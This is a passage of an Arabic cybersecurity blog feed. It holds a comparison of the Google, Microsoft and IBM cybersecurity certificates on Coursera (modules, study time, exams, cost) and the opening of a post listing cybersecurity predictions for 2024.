&lt;li&gt;&lt;a href=&quot;https://www.coursera.org/professional-certificates/google-cybersecurity&quot;&gt;Google’s Cybersecurity Certification&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;https://www.coursera.org/professional-certificates/microsoft-cybersecurity-analyst&quot;&gt;Microsoft Cybersecurity Analyst Professional Certificate&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;https://www.coursera.org/professional-certificates/ibm-cybersecurity-analyst&quot;&gt;IBM Cybersecurity Analyst Professional Certificate&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;ونكتشف ما إذا كانت هذه الرحلة ستضعك على قمة التحدي، استعد للاستكشاف والتحليق في عالم مليء بالتكنولوجيا والتحديات الشيقة.&lt;/p&gt;
&lt;p&gt;سنقوم بمراجعة هذه الشهادات المهنية وفحص محتواها وسنلقي نظرة على الاختلاف بينها وسنقدم بشكل تقريبي الوقت الذي قد تحتاجه لاجتياز كل شهادة، بالإضافة إلى التكلفة المالية.&lt;/p&gt;
&lt;h2 id=&quot;المدة-الزمنية&quot;&gt;المدة الزمنية&lt;/h2&gt;
&lt;p&gt;&lt;strong&gt;من المهم جدا معرفة الوقت اللازم لإتمام كل شهادة.&lt;/strong&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;
&lt;p&gt;للتحضير لشهادة &lt;em&gt;&lt;strong&gt;IBM Cybersecurity Analyst Professional Certificate&lt;/strong&gt;&lt;/em&gt;، ستحتاج إلى حوالي 4 أشهر بمتوسط دراسة 10 ساعات أسبوعياً.&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;للتحضير لشهادة &lt;em&gt;&lt;strong&gt;Google’s Cybersecurity Certification&lt;/strong&gt;&lt;/em&gt; ستحتاج إلى حوالي 6 أشهر بمتوسط دراسة 7 ساعات أسبوعياً&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;للتحضير لشهادة &lt;em&gt;&lt;strong&gt;Microsoft Cybersecurity Analyst Professional Certificate&lt;/strong&gt;&lt;/em&gt; ستحتاج إلى حوالي 6 أشهر بمنوسط دراسة 10 ساعات أسبوع&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;مع ذلك، يجب أن تعتبر هذه الأرقام مجرد متوسطات وقد يستطيع البعض إكمال الشهادات في فترة أقل بحسب قدرات الفرد على استيعاب المعلومات وظروف حياته اليومية.&lt;/p&gt;
&lt;h2 id=&quot;تفاصيل-الشهادات-الثلاث-و-ما-تقدمه-من-محتوى&quot;&gt;تفاصيل الشهادات الثلاث و ما تقدمه من محتوى&lt;/h2&gt;
&lt;p&gt;&lt;a href=&quot;https://www.coursera.org/professional-certificates/google-cybersecurity&quot;&gt;Google’s Cybersecurity Certification&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;&lt;img alt=&quot;بطاقة شهادة Google للأمن السيبراني: 6 أشهر و7 ساعات أسبوعياً و8 محاور تدريبية&quot; width=&quot;1600&quot; height=&quot;900&quot; src=&quot;https://blog.cyberpedia.site/_astro/img-01.4lGHtoTI_ZI9h2h.webp&quot;&gt;&lt;/p&gt;
&lt;p&gt;تعد شهادة Google للأمن السيبراني خياراً رائعاً للأفراد الذين يرغبون في الانطلاق في عالم الحماية الرقمي، تقدم هذه الشهادة تجربة شاملة تتألف من ثمانية محاور مثيرة، تأسر الخيال وتوجهك نحو فهم عميق لمجال الأمن السيبراني&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;في المحور الأول&lt;/strong&gt;:&lt;/p&gt;
&lt;p&gt;يقدم البرنامج لك أساسيات الأمن السيبراني في رحلة تستمر 14 ساعة، فتُدرك أهمية الأساسيات وتُشارك في تجارب تعلم مشوقة.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;في المحور الثاني&lt;/strong&gt;:&lt;/p&gt;
&lt;p&gt;حيث تنغمس في عالم الحماية بشكل أعمق، مع تعلم كيفية تحديد التهديدات والمخاطر الرقمية، بالإضافة لاستخدام أدوات وأنظمة الحماية المتقدمة مثل أنظمة إدارة الأحداث والمعلومات الأمنية (Security Information and Event Management) SIEM، مدة هذا المحور 11 ساعة.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;في المحور الثالث:&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;ستكتشف أساسيات الأمن السيبراني والحماية الخاصة بالشبكات، حيث ستستمتع برحلة تستمر 14 ساعة لفهم طبقات الشبكة وأسرار البورتات.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;في المحور الرابع&lt;/strong&gt;:&lt;/p&gt;
&lt;p&gt;يُعنى هذا المحور ببيئة Linux وأدوات وتقنيات الحماية الخاصة بهذه الأنظمة، حيث تتعلم كيف تتعامل مع المخاطر والتهديدات، مع تعلم لغة SQL واستخدامها بشكل فعّال، يمتد هذا المحور لـمدة 27 ساعة.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;في المحور الخامس:&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;يأخذك هذا المحور في رحلة تحليل سطح الهجوم واكتشاف الثغرات في نظامك، بالإضافة إلى التعرف على هجمات الهندسة الاجتماعية، مدة هذا المحور 26 ساعة.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;في المحور السادس:&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;ستتعرف على طرق احتواء الحوادث الأمنية وستتعلم كيفية التعامل معها، بالإضافة إلى تحليل حركة حزم الشبكة وفهم مكونات التوقيعات الرقمية، مدة هذا المحور 24 ساعة&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;في المحور السابع:&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;يركز هذا المحور على لغة البرمجة Python وأهميتها في مجال الحماية الرقمي، وكيفية استخدامها للقيام بمهام مخصصة، مدة هذا المحور 30 ساعة&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;في المحور الثامن:&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;يقودك هذا المحور إلى فهم متى وكيفية التصعيد الأمني ويُلهمك للمشاركة في المجتمع السيبراني والبحث عن فرص العمل في هذا المجال، في رحلة مكثفة تستمر لمدة 18 ساعة.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;باختصار: تعتبر شهادة Google للأمن السيبراني&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;مفتاحاً رائعاً للانطلاق في عالم الأمن السيبراني، فهي تقدم تجربة شاملة ومثيرة لبناء أساس قوي في هذا المجال المثير والمتطور&lt;/strong&gt;&lt;/p&gt;
&lt;/blockquote&gt;
&lt;h2 id=&quot;microsoft-cybersecurity-analyst-professional-certificate&quot;&gt;&lt;a href=&quot;https://www.coursera.org/professional-certificates/microsoft-cybersecurity-analyst&quot;&gt;Microsoft Cybersecurity Analyst Professional Certificate&lt;/a&gt;&lt;/h2&gt;
&lt;p&gt;&lt;img alt=&quot;بطاقة شهادة Microsoft للأمن السيبراني: 6 أشهر و10 ساعات أسبوعياً و9 محاور تركّز على الحوسبة السحابية&quot; width=&quot;1600&quot; height=&quot;900&quot; src=&quot;https://blog.cyberpedia.site/_astro/img-02.Dfn4gSA9_ZAYwwH.webp&quot;&gt;&lt;/p&gt;
&lt;p&gt;تقدم هذه الشهادة فرصة فريدة لاكتساب المهارات والمعرفة اللازمة للدخول إلى عالم الحماية الرقمية والأمن السيبراني.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;في المحور الأول:&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;ستغوص في أعماق مكونات الحاسوب وتفاعلها مع نظام التشغيل وتستكشف أساسيات الأمن السيبراني على مدار 14 ساعة من التدريب المثير.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;في المحور الثاني:&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;ستقوم بإعداد بيئة الحوسبة السحابية على Azure وتكتسب فهماً عميقاً للأنظمة الافتراضية Virtual Machine والخدمات السحابية، خلال رحلة مدتها 25 ساعة.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;في المحور الثالث:&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;حيث ستُسلط الضوء على التهديدات السيبرانية المتقدمة وتكتسب مهارات استكشاف الثغرات والتصدي للهجمات، مع فهم لخوارزميات التشفير واستخداماتها على مدار 20 ساعة.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;في المحور الرابع:&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;يقودك هذا المحور نحو استكشاف الأمن السيبراني بأبعاده المتنوعة على مدار 21 ساعة.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;في المحور الخامس:&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;ستتعرف على أنواع سياسات الحماية للبنية السحابية وكيفية حماية هذه البيئات من هجمات منع الخدمة وخروقاتوتسريب البيانات، مع استعراض أدوات الحماية السحابية على مدار 22 ساعة.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;في المحور السادس:&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;ستتعلم أدوات اختبار الحماية داخل البيئة السحابية وكيفية تنفيذ اختبارات الاختراق على الأنظمة السحابية، مع تدريب يستمر لمدة 20 ساعة.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;في المحور السابع:&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;ستتعرف على كيفية إدارة البيانات والسجلات و حماية المعلومات وكتابة سياسات الحماية، في رحلة مثيرة تستمر 20 ساعة.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;في المحور الثامن:&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;ستبدأ على التعرف على طرق التخفيف من التهديدات باعتبارك خبيراً في نمذجة التهديدات، بالإضافة للتعرف على كيفية إدارة وحماية أجهزة انترنت الأشياء IoT على مدار 27 ساعة.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;في المحور الأخير:&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;ستغوص في مفاهيم وقوانين ومعايير الأمن السيبراني والامتثال المختلفة، مع استعراض لإمكانيات الحلول الأمنية المقدمة من قبل شركة Microsoft على مدار 14 ساعة.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;إجمالاً، تُعد شهادة Microsoft Cybersecurity Analyst Professional&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;مثالية للذين يمتلكون معرفة مسبقة في مجال الأمن السيبراني ويرغبون في الانطلاق في عالم الحماية الرقمية للخدمات السحابية.&lt;/strong&gt;&lt;/p&gt;
&lt;/blockquote&gt;
&lt;h2 id=&quot;ibm-cybersecurity-analyst-professional-certificate&quot;&gt;&lt;a href=&quot;https://www.coursera.org/professional-certificates/ibm-cybersecurity-analyst&quot;&gt;IBM Cybersecurity Analyst Professional Certificate&lt;/a&gt;&lt;/h2&gt;
&lt;p&gt;&lt;img alt=&quot;بطاقة شهادة IBM للأمن السيبراني: 4 أشهر و10 ساعات أسبوعياً و8 محاور تركّز على الأساسيات&quot; width=&quot;1600&quot; height=&quot;900&quot; src=&quot;https://blog.cyberpedia.site/_astro/img-03.CAmzJ5qK_1xyeYm.webp&quot;&gt;&lt;/p&gt;
&lt;p&gt;استعد لاكتساب الخبرات الرائدة في عالم الأمن السيبراني من خلال شهادة IBM Cybersecurity Analyst Professional! على الرغم من أن هذه الشهادة قد تكون الأقدم في الساحة، إلا أنها تقدم محتوى غني ومتنوع يشمل ثمانية محاور مثيرة للتعلم.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;في المحور الأول:&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;ستنطلق في رحلة استكشاف أنواع البرمجيات الخبيثة Malware وتطور طرق الحماية عبر العصور، مع تسليط الضوء على كيفية الاستجابة للحوداث الأمنية، على مدار 17 ساعة من التدريب المكثف.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;في المحور الثاني:&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;ستتعرف على عالم الأمن السيبراني، حيث ستكتسب خلفية قوية حول دور الحماية في المجتمع التكنولوجي، في رحلة تمتد لحوالي 12 ساعة.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;في المحور الثالث:&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;حيث ستُلقي نظرة على المعايير الأساسية مثل NIST – GDPR – HIPAA بالإضافة إلى فهم دور ووظائف فرق الحماية/ على مدار 17 ساعة.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;في المحور الرابع:&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;ستنتقل إلى فهم أساسيات الشبكات TCP/IP وOSI، بالإضافة إلى فهم أنظمة عناوين الشبكة وأسرار التبديل والتوجيه، في رحلة تمتد لحوالي 14 ساعة.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;في المحور الخامس:&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;ستنتقل لاكتساب الأساسيات الضرورية لمهارات الأمن السيبراني، عبر 15 ساعة من التدريب المكثف.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;في المحور السادس:&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;ستفهم تكتيكات الدفاع عن الشبكات وتقنيات التحكم بالوصول، بالإضافة إلى كيفية مراقبة الشبكة، في رحلة ممتدة لـ 25 ساعة.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;في المحور السابع:&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;ستنتقل لاستكشاف منهجيات الاستجابة للحوادث الأمنية وكشف الستار عن انتهاكات سابقة وحديثة وكيفية الدفاع عن الهجمات في المستقبل، خلال 15 ساعة من التدريب.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;في المحور الثامن:&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;ستتعمق في فهم الوظائف المثيرة في عالم الحماية، مع توجيه مفصل لكيفية تحضير نفسك للاندماج في سوق العمل، في محور يمتد لساعات محدودة.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;بشكل عام، تعد شهادة IBM للأمن السيبراني خياراً ممتازاً&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;خاصة إذا كنت تمتلك معرفة مسبقة في المجال و تريد الانغماس في تجربة مثيرة لفهم المزيد عن هذا المجال و تريد الاستعداد لبناء مستقبلك المهني في عالم الأمن السيبراني&lt;/p&gt;
&lt;/blockquote&gt;
&lt;h2 id=&quot;المحاور-و-المحتوى-المقدم-حسب-رأيي-الشخصي&quot;&gt;المحاور و المحتوى المقدم حسب رأيي الشخصي&lt;/h2&gt;
&lt;p&gt;بدعوى استكمال مقارنة الشهادات الثلاث وبرامج التدريب، يظهر بوضوح أن الجوانب المشتركة بينهم تتمثل في أهمية فهم مفهوم الشبكات في عالم الأمن السيبراني، بمعنى آخر إذا لم تكن لديك معرفة بالشبكات، فإنك قد تجد صعوبة في التفاعل مع متطلبات هذا المجال المتطور بسرعة ولهذا السبب انصحك وبشدة بقراءة هذا الكتاب &lt;a href=&quot;https://books.cyberpedia.site/product/network-ops/&quot;&gt;الدليل الشامل لأساسيات الشبكات في مجال الأمن السيبراني&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;عند التركيز على المقارنة العميقة بين Google and IBM، يبرز تشابه بينهما، حيث يركزان على جوانب معينة. برنامج Microsoft، على الجانب الآخر، يبدي اهتماماً كبيراً بمنتجاته الخاصة، مما قد يكون غير ملائم حينما تكون الغاية في البداية هي فهم المجال بشكل أوسع.&lt;/p&gt;
&lt;p&gt;عند المقارنة بين Google and IBM، تظهر شهادة IBM بأنها تركز على جوانب متنوعة، في حين تركز شهادة Google بشكل أكبر على &lt;a href=&quot;https://blog.cyberpedia.site/difference-between-linux-distributions/&quot;&gt;نظام التشغيل Linux&lt;/a&gt; و قواعد البيانات والاستجابة للحوادث الأمنية.&lt;/p&gt;
&lt;p&gt;إذاً، يظهر أن IBM تضع تأسيساً قوياً في المفاهيم الأساسية، مطالبة بفهم الطلاب للأساسيات قبل الأدوات، بالمقابل فإن Google تشير إلى رغبتها في جعل الطلاب محللين أمنيين من خلال التركيز الأكبر على الاستجابة للحوادث الأمنية.&lt;/p&gt;
&lt;p&gt;إذا كان هدفك هو أن تصبح محلل أمني، يظهر أن شهادة Google توفر نطاقاً أوسع وشمولية أكبر ويجب أن تأخذ في اعتبارك أن محتوى IBM قد يكون قديماً مما يشير إلى أن التحديثات والتكنولوجيا الحديثة قد لا تكون مشمولة بشكل كامل.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;باختصار، يبدو أن Google تقدم منحى أوسع وشامل في مجال السيبراني&lt;/p&gt;
&lt;p&gt;مما يجعلها خياراً أفضل لمن يرغب في أن يكون محلل أمني متميزاً.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;h2 id=&quot;الاختبار-أو-الامتحان-النهائي&quot;&gt;الاختبار أو الامتحان النهائي&lt;/h2&gt;
&lt;p&gt;تتألق الشهادات الثلاث، Google, IBM, and Microsoft، كوجهات مختلفة في رحلة اكتساب المعرفة في ميدان الأمن السيبراني.&lt;/p&gt;
&lt;p&gt;تبرز شهادة IBM بامتحانها النهائي الذي يمتد لأربع ساعات، مما يجعلها تتميز بتحديد مستوى الفهم بشكل عميق ومع ذلك، يجب التفرغ للفحص العملي في Google and Microsoft، حيث يطلب منك اجتياز اختبارات متعددة خلال الدورة.&lt;/p&gt;
&lt;p&gt;الاختبارات العملية تعتبر أساسية للحفاظ على المعرفة على المدى الطويل وهي طريقة فعالة لضمان اكتساب المهارات العملية التي تحتاجها في عالم الأمن السيبراني، إذا كنت تسعى للانتقال من المستوى المبتدئ إلى المتوسط في هذا المجال، فإن هذه الاختبارات تعتبر أمر ضروري لتحقيق هذا الهدف.&lt;/p&gt;
&lt;h2 id=&quot;التكلفة-المادية&quot;&gt;التكلفة المادية&lt;/h2&gt;
&lt;p&gt;الشهادات الثلاثة متاحة ومقدمة عبر منصة &lt;a href=&quot;https://www.coursera.org&quot;&gt;Coursera&lt;/a&gt; وبالتالي فإن السعر موحد لأي شهادة تختارها على المنصة، يتراوح سعر الاشتراك في Coursera حوالي 49 دولاراً شهرياً، مع إمكانية الحصول على فترة تجريبية مجانية تستمر لمدة 7 أيام عند التسجيل.&lt;/p&gt;
&lt;p&gt;يمكنك دفع هذا المبلغ ودراسة عدة شهادات خلال الفترة المتاحة دون أي قيود مما يجعل العملية ميسرة من الناحية المالية.&lt;/p&gt;
&lt;h2 id=&quot;في-النهاية&quot;&gt;في النهاية&lt;/h2&gt;
&lt;p&gt;لا ينبغي عليك الإسراع في دراسة هذه الشهادات، خاصة إذا كنت مبتدئ في هذا المجال ويفضل أن تأخذ الوقت الكافي لفهم جميع المفاهيم وتطبيقها بشكل صحيح.&lt;/p&gt;
&lt;p&gt;كما تجدر الإشارة إلى أنه ليس من الضروري دراسة كل الشهادات الثلاث نظراً لوجود قدر لا بأس به من التداخل كما هو الحال في أسمائهم.&lt;/p&gt;
&lt;p&gt;لا تنسى القاعدة العامة في العالم التقني: ” كلما تعلمت أكثر كلما زادت فرص نجاحك في هذا المجال بشكل أكبر”&lt;/p&gt;
</content:encoded><category>المسار المهني والشهادات</category><category>شهادات الأمن السيبراني</category><category>كورسيرا</category><category>Google</category><category>Microsoft</category><category>IBM</category></item><item><title>توقعات الأمن السيبراني لعام 2024</title><link>https://blog.cyberpedia.site/cybersecurity-predictions-2024/</link><guid isPermaLink="true">https://blog.cyberpedia.site/cybersecurity-predictions-2024/</guid><description>عشر توقعات للأمن السيبراني في 2024: هجمات الفدية، الذكاء الاصطناعي الهجومي والدفاعي، ثغرات إنترنت الأشياء، الحوسبة الكمومية، الثقة الصفرية وغيرها.</description><pubDate>Sun, 31 Dec 2023 08:35:34 GMT</pubDate><content:encoded>&lt;p&gt;&lt;strong&gt;تشمل أبرز توقعات الأمن السيبراني لعام 2024: تصاعد هجمات الفدية ضد البنية التحتية الحيوية، استخدام الذكاء الاصطناعي في الهجوم والدفاع، تزايد ثغرات إنترنت الأشياء والسيارات الكهربائية، تهديد الحوسبة الكمومية للتشفير، والتوسع في اعتماد نموذج الثقة الصفرية و DevSecOps وقوانين خصوصية أصرم.&lt;/strong&gt;&lt;/p&gt;&lt;p&gt;التنبؤ بالمستقبل في مجال &lt;a href=&quot;https://blog.cyberpedia.site/what-is-cyber-security/&quot;&gt;الأمن السيبراني&lt;/a&gt; يعتمد على الحقائق الموجودة لدينا، بالنسبة للقارئ العادي  قد يبدو التنبؤ بمستقبل الأمن السيبراني للعام المقبل بمثابة عمل تخميني أو تكهنات  ولكن بالنسبة لنا نحن العاملين في مجال الأمن السيبراني فإن هذا التوقع الاستباقي لما قد يخطط له الأشرار ومجرمي الانترنت يعتبر أمر ضروري ولا بده منه.&lt;/p&gt;
&lt;p&gt;يمكن أن نعترف جميعاً بأن عام 2023 كان عاماً بالغ الأهمية وتميز بتقدم ملحوظ وتحديات كبيرة في مجال الأمن السيبراني، الآن تتوجه أعيننا لعام  جديد ونستعد لاستقبال عام 2024 وبالتأكيد فإن مشهد الأمن السيبراني على أعتاب تحولات جوهرية تتميز بالتعقيد المتزايد والتهديدات المتطورة والاعتراف المتزايد بضرورة إيجاد حلول أمنية متطورة ومتكاملة ونظراً لموقعنا على مفترق طرق التطورات التكنولوجية غير المسبوقة وتحديات الأمن السيبراني المتصاعدة، يجب على الأفراد والمنظمات على حد سواء الاستعداد للرحلة المقبلة والتعامل مع التحديات الأمنية بالشكل الأمثل ولهذا السبب نقدم لكم في هذا المقال توقعات شاملة للأمن السيبراني لعام 2024 والتي يجب أن تكون موضع اهتمام لجميع العاملين في هذا المجال.&lt;/p&gt;
&lt;h2 id=&quot;إليك-توقعات-الأمن-السيبراني-التي-قد-نواجهها-في-عام-2024&quot;&gt;إليك توقعات الأمن السيبراني التي قد نواجهها في عام 2024&lt;/h2&gt;
&lt;h3 id=&quot;1--ازياد-في-عدد-هجمات-برامج-الفدية-ransomware-attacks&quot;&gt;1- ازياد في عدد هجمات برامج الفدية Ransomware Attacks&lt;/h3&gt;
&lt;p&gt;من المتوقع أن تستمر هجمات &lt;a href=&quot;https://www.microsoft.com/ar/security/business/security-101/what-is-ransomware&quot;&gt;برامج الفدية&lt;/a&gt; والتي شكلت تهديداً مستمراً في السنوات الأخيرة وفي عام 2024 من المرجح أن لا يستهدف مجرمو الإنترنت الشركات فحسب، بل سيتم استهداف البنية التحتية الحيوية والخدمات الحكومية ولا تزال الاحتمالات الكبيرة واردة لتعطيل الخدمات والتعرض لخسائر مالية كبيرة وبالتأكيد فإن هذا الأمر يجب أن يدفع المؤسسات لإعطاء الأولوية لحلول النسخ الاحتياطي القوية وتدريب الموظفين والتركيز على اكتشاف وإصلاح الثغرات للتخفيف من تأثير هجمات برامج الفدية.&lt;/p&gt;
&lt;h3 id=&quot;2--ازدياد-الهجمات-المدعومة-بالذكاء-الاصطناعي&quot;&gt;2- ازدياد الهجمات المدعومة بالذكاء الاصطناعي&lt;/h3&gt;
&lt;p&gt;سيلعب &lt;a href=&quot;https://blog.cyberpedia.site/what-is-artificial-intelligence/&quot;&gt;الذكاء الاصطناعي AI&lt;/a&gt; والتعلم الآلي  ML دور كبير وبشكل متزايد في الهجمات السيبرانية في عام 2024 ومن المتوقع أن يستفيد مجرمو الإنترنت من تقنيات الذكاء الاصطناعي والتعلم الآلي لأتمتة قدراتهم وتعزيزها، مما سيجعل الهجمات أكثر تعقيداً وأكثر تكلفة من ناحية الخسائر ولهذا السبب يجب على متخصصي الأمن السيبراني الاستفادة أيضاً من الذكاء الاصطناعي في الجانب الدفاعي ليتمكنوا من التصدي للتهديدات المتطورة.&lt;/p&gt;
&lt;h3 id=&quot;3--الذكاء-الاصطناعي-في-الجانب-الدفاعي&quot;&gt;3- الذكاء الاصطناعي في الجانب الدفاعي&lt;/h3&gt;
&lt;p&gt;يقدم التطور السريع للذكاء الاصطناعي فرصاً وتحديات في مجال الأمن السيبراني، كما أن نفس الأدوات التي تزود المهاجمين بقدرات متقدمة يمكن أن تكون مفيدة في الجانب الدفاعي وهذا الأمر قد تم اعتماده في العديد من الحلول الأمنية ومن المتوقع الاستمرار والتوسع في استخدام وتطبيق الذكاء الاصطناعي بشكل فعال في الجانب الدفاعي والتأكد من أنه سيعالج مشاكل متقدمة لا يمكن معالجتها بالطرق التقليدية.&lt;/p&gt;
&lt;h3 id=&quot;4--ازدياد-الثغرات-في-أجهزة-انترنت-الأشياء-iot&quot;&gt;4- ازدياد الثغرات في أجهزة انترنت الأشياء IoT&lt;/h3&gt;
&lt;p&gt;سيؤدي الاعتماد المتزايد على أجهزة &lt;a href=&quot;https://ar.wikipedia.org/wiki/%D8%A5%D9%86%D8%AA%D8%B1%D9%86%D8%AA_%D8%A7%D9%84%D8%A3%D8%B4%D9%8A%D8%A7%D8%A1&quot;&gt;انترنت الأشياء IoT&lt;/a&gt;  إلى ظهور ثغرات ونقاط ضعف جديدة في عام 2024، تفتقر العديد من هذه الأجهزة إلى تدابير الحماية الأساسية مما يجعلها أهدافاً جذابة للمهاجمين&lt;/p&gt;
&lt;p&gt;تعتبر المعالجة الفورية والسريعة للمشاكل الأمنية في أجهزة انترنت الأشياء IoT  أمر بالغ الأهمية، حيث تستمر هذه الأجهزة في الاندماج بشكل متزايد في حياتنا اليومية وفي البنية التحتية الحيوية ضمن جميع المجالات ولهذا السبب يجب على المصنعين والمستهلكين إعطاء الأولوية لتفعيل ميزات الحماية وتطبيق التحديثات الخاصة بأنظمة التشغيل لهذه الأجهزة، بالإضافة لاستخدام آليات المصادقة القوية للحماية من التهديدات التي تستهدف هذه الأجهزة.&lt;/p&gt;
&lt;h3 id=&quot;5--اختراق-السيارات-الكهربائية&quot;&gt;5- اختراق السيارات الكهربائية&lt;/h3&gt;
&lt;blockquote&gt;
&lt;p&gt;يوجد مقولة مشهورة في مجال الأمن السيبراني تقول:&lt;/p&gt;
&lt;p&gt;كل شيء متصل فهو عرضة للاختراق&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;وبالتأكيد هذه المقولة تنطبق على وسائل النقل والسيارات الحديثة وخاصة الكهربائية منها والتي ستكون أهداف محتملة للهجمات السيبرانية، بما أن معظم المركبات على الطريق اليوم تعتمد على العديد من الأنظمة الالكترونية والحاسوبية بالإضافة لتقنيات الاتصال والتحكم عن بعد وبالتأكيد هذه الأنظمة لن تخلو من الثغرات الأمنية ونقاط الضعف وبالتالي هي عرضه للهجمات، الأمر الذي يشكل تهديداُ كبير قد يمس بحياة مستخدمي هذه السيارات وهنا تجدر الإشارة لضرورة معالجة هذا الأمر واتخاذ تدابير الأمن السيبراني المناسبة للتعامل مع هذا المشهد المرعب.&lt;/p&gt;
&lt;h3 id=&quot;6--تهديدات-الحوسبة-الكمومية-quantum-computing&quot;&gt;6- تهديدات الحوسبة الكمومية Quantum Computing&lt;/h3&gt;
&lt;p&gt;التطورات المستمرة في &lt;a href=&quot;https://aws.amazon.com/ar/what-is/quantum-computing/&quot;&gt;الحوسبة الكمومية&lt;/a&gt; ستعيد تشكيل مشهد الأمن السيبراني في عام 2024 وخاصة في تقنيات وخوارزميات التشفير فقد أصبح من الممكن للقوة الحسابية الهائلة لأجهزة الكمبيوتر الكمومية أن تكسر خوارزميات التشفير الحالية والتي كانت غير قابلة للكسر سابقاً مثل خوارزمية التشفير RSA المستخدمة في العديد من تقنيات الاتصال عبر شبكة الانترنت وبالتأكيد هذا الأمر سيدفعنا لتطوير تقنيات تشفير وتدابير حماية جديدة كما يجب على المؤسسات أن تبقى مطلعة على تطورات الحوسبة الكمومية وأن تفكر في الاستثمار في التشفير المقاوم للكم.&lt;/p&gt;
&lt;h3 id=&quot;7--الحاجة-إلى-devsecops&quot;&gt;7- الحاجة إلى DevSecOps&lt;/h3&gt;
&lt;p&gt;الاستخدام المتزايد ل API والتطبيقات المتعددة الأخرى يؤدي لزيادة في سطح الهجوم وهنا تأتي أهمية اعتماد ممارسات  &lt;a href=&quot;https://aws.amazon.com/ar/what-is/devsecops/#:~:text=DevSecOps%20%D9%87%D9%88%20%D8%A7%D8%AE%D8%AA%D8%B5%D8%A7%D8%B1%20%D9%84%D9%84%D8%B9%D8%A8%D8%A7%D8%B1%D8%A9%20development,%D8%A7%D9%84%D8%A8%D8%B1%D9%85%D8%AC%D9%8A%D8%A7%D8%AA%20%D8%B9%D9%86%D8%AF%20%D8%A5%D9%86%D8%B4%D8%A7%D8%A1%20%D8%AA%D8%B7%D8%A8%D9%8A%D9%82%D8%A7%D8%AA%20%D8%A8%D8%B1%D9%85%D8%AC%D9%8A%D8%A9.&quot;&gt;DevSecOps&lt;/a&gt; (development, security and operations) للقيام بعملية التطوير الآمن للبرامج والتطبيقات&lt;/p&gt;
&lt;p&gt;من المتوقع الاستثمار بشكل أكبر بهذا المجال في العام القادم للحصول على الأقل على مستوى حماية مقبول.&lt;/p&gt;
&lt;h3 id=&quot;8--المزيد-من-الاعتماد-على-مبدأ-الثقة-الصفرية&quot;&gt;8- المزيد من الاعتماد على مبدأ الثقة الصفرية&lt;/h3&gt;
